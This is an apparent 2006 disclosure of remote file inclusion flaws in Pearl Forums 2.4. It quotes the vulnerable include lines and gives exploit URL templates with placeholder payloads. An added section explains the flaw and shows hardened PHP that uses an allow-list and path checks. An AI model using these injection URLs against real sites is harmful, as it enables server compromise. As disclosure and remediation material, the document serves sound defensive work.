Computer Security
[EN] securityvulns.ru
From:Dr Max Virus <drmaxvirus_(at)_w.cn>
Date:22.11.2006
Subject:Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main Script Of Pearl Products
//Affected Version:2.4
//D
script:
http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=switch&filename=pearlforums2.4.zip&351611

/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------

Bug in addressbook.php & admin.php & merge.php & more files than you expected are vulnerable; just try to check all files, like the vulnerable scripts of Pearl.

--------------------------------------------------------------------------------
\\

-------------------------------------------------------------------------------
Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
include_once("$templatesDirectory/admin.php");

-----------------------------------------------------------------------------------
Exploits:
~~~~~~~~~
Note that more variables are not sanitized, so the exploits can work successfully when register_globals=on



http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code

   And many more bugs you can discover; just download the script

-----------------------------------------------------------------------------------
   Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
   Special Gr33Ts:ASIANEAGLE & Kacper & The Master

////////////////////////////////////////////////////////////////////////////////////
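As an added illustration (editor's example, not part of the advisory and not Pearl Forums' own code), the include pattern quoted above under "Vul Codes" is shown beside a hardened form: the hardened version never builds an include path from request-controlled data and verifies that the resolved file lies inside the application's template directory. The template directory location and the template names are assumed.

```php
<?php
// Added example, not Pearl Forums' code. Shows the register_globals
// remote-file-include pattern quoted in the advisory and one way to close it.

// --- Vulnerable pattern (as quoted in the advisory) -----------------------
// With register_globals=on (removed in PHP 5.4), a request parameter such as
//   ?GlobalSettings[templatesDirectory]=...
// populates $GlobalSettings before this function is reached, so the include
// path is attacker-controlled; with allow_url_include=On it may even be a URL.
function vulnerable_include(array $GlobalSettings): void
{
    include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
}

// --- Hardened pattern -----------------------------------------------------
// 1. The base directory is a constant, never taken from the request.
// 2. Only a fixed set of template names may be included.
// 3. The resolved path must lie inside the base directory, which also rejects
//    "../" traversal and stream-wrapper URLs (realpath() returns false for them).
define('TEMPLATES_DIR', __DIR__ . '/templates');   // assumed location

const ALLOWED_TEMPLATES = ['addressbook', 'admin', 'merge', 'profile', 'poll'];

function safe_template_path(string $name): string
{
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        throw new InvalidArgumentException("unknown template: $name");
    }
    $base = realpath(TEMPLATES_DIR);
    $path = realpath(TEMPLATES_DIR . '/' . $name . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("template missing or outside TEMPLATES_DIR: $name");
    }
    return $path;
}

function safe_include(string $name): void
{
    include_once safe_template_path($name);
}

// Usage: safe_include('addressbook');
// A request parameter named GlobalSettings or templatesDirectory no longer has
// any influence on which file is loaded.
```

Disabling register_globals (or running a PHP version that no longer has it) removes the injection vector the advisory relies on, but the allow-list and path check above keep the include safe even if a later code change reintroduces a request-derived variable.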
